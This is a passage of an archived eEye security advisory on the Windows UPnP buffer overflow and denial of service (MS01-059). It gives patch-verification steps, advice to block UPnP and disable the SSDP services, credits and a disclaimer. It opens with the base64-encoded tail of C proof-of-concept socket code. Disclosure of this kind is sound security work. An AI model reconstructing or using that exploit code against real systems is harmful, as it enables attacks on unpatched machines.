	ZW5kX2J1ZmZlciksMCxcDQoJKHN0cnVjdCBzb2NrYWRkciAqKSZ0aGVpcl9hZGRyLCBzaXplb2Yo

	c3RydWN0IHNvY2thZGRyKSkpID09LTEpDQoJew0KCQlwZXJyb3IoInNlbmQiKTsNCgkJZXhpdCgw

	KTsNCgl9DQoJY2xvc2Uoc29ja2ZkKTsNCg0KcmV0dXJuIDA7DQp9DQoNCg0KPC9YTVA+PC9CT0RZ

	PjwvSFRNTD4NCg==

	

	------_=_NextPart_001_01C19915.7D29A2BD--

	

	

SOLUTION

	 Vendor Status:

	

	Microsoft has released a patch and security bulletin  which  is  located
	at:
	

	http://www.microsoft.com/technet/security/bulletin/MS01-059.asp

	

	

	To verify that the patch has been  installed  on  your  system  use  the
	following:
	

	 Windows 98 and 98SE:

	To verify that the patch has  been  installed  on  the  machine,  select
	Start, then Run,  then  run  the  QFECheck  utility.  If  the  patch  is
	installed, \"Windows 98  Q314941  Update\"  will  be  listed  among  the
	installed  patches.  To  verify  the  individual  files,  use  the  file
	manifest provided in Knowledge Base article Q314941.
	

	 Windows ME:

	To verify that the patch has  been  installed  on  the  machine,  select
	Start, then Run,  then  run  the  QFECheck  utility.  If  the  patch  is
	installed, \"Windows Millennium Edition Q314757 Update\" will be  listed
	among the installed patches. To verify the  individual  files,  use  the
	file manifest provided in Knowledge Base article Q314757.
	

	 Windows XP:

	To verify that the patch has been  installed  on  the  machine,  confirm
	that the following  registry  key  has  been  created  on  the  machine:
	HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows
	XP\\SP1\\Q315000. To verify the individual files, use the date/time  and
	version  information   provided   in   the   following   registry   key:
	HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows
	XP\\SP1\\Q315000\\Filelist.
	

	The Common Vulnerabilities and Exposures (CVE) project has assigned  the
	following two ID\'s:
	 The Buffer Overflow: CAN-2001-0876

	 The Denial of Service: CAN-2001-0877

	This is a candidate for inclusion in the CVE list  http://cve.mitre.org,
	which standardizes names for security problems.
	

	We would strongly suggest denying all  UPNP  traffic  at  your  internet
	borders as there is really no need to  allow  UPNP  traffic  across  the
	Internet. Also it  would  be  wise  to  completely  turn  off  the  UPNP
	service\'s as most users are probably not utilizing  them  anyways.  The
	less services running on your machine the safer you will  be.  The  SSDP
	Discovery Service and Universal Plug and Play Host service  should  both
	be set to manual load.
	

	 Discovery:

	Riley Hassell <riley@eeye.com>
	

	 With extra help from:

	Ryan Permeh - for technical advice and exploitation analysis  for  those
	difficult reverse  engineering  situations  that  Ryan  has  wet  dreams
	about.
	

	Marc Maiffret - as always  with  superb  technical  insight  helping  to
	discover and exploit the  vulnerabilities  in  this  advisory  and  once
	again proving that two heads are better than one.
	

	Neothoth - \"The typing machine\", for camping out day and night in  the
	eEye lab hammering vulnerabilities in URL handlers. Neo rocks :)
	

	 Greetings:

	Mr. Patron and  his  tequila  and  the  Three  Wise  Men(jim,  jack  and
	johnny). Also Abraxas coffeeshop in Amsterdam. eEye would like to  offer
	thanks to  all  organizations  supporting  full  disclosure,  especially
	Securityfocus.com and NMRC. Don\'t let silly politics get in the way  of
	what is right for everyone\'s security.
	

	oh yeah, one more thing:
	

	Four score and numerous advisories ago, a security company  set  off  to
	tell the world about its love of Tequila.  However,  little  did  people
	know, the team was not even legal. Now  that  the  youngin\'s  Marc  and
	Riley turned 21 this Nov. we are all officially legal.  That  means  the
	next time the NSA buys us  beer  at  a  sec  conference,  they  wont  be
	breaking the law.
	

	 Copyright (c) 1998-2001 eEye Digital Security

	Permission is hereby  granted  for  the  redistribution  of  this  alert
	electronically. It is not to  be  edited  in  any  way  without  express
	consent of eEye. If you wish to reprint the whole or any  part  of  this
	alert in any other medium excluding  electronic  medium,  please  e-mail
	alert@eEye.com for permission.
	

	 Disclaimer

	The information provided in this advisory  may  change  without  notice.
	Your reproduction or use  of  this  information  shall  constitute  your
	acceptance of the terms in this paragraph. This information is  provided
	\"AS IS\" and eEye Digital Security disclaims  all  warranties,  express
	and implied, with  regard  to  this  information.  This  information  is
	provided only for legitimate security analysis  purposes.  eEye  Digital
	Security does not condone the unauthorized  access  of  systems  or  the
	writing or launching of worms, viruses or other software  for  malicious
	purposes, and specifically prohibits the use  or  reproduction  of  this
	information for such purposes. In no event shall eEye  Digital  Security
	or any author be liable for any damages whatsoever arising out of or  in
	connection with the use or dissemination of this  information.  Any  use
	of this information is at the user\'s own risk.
	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH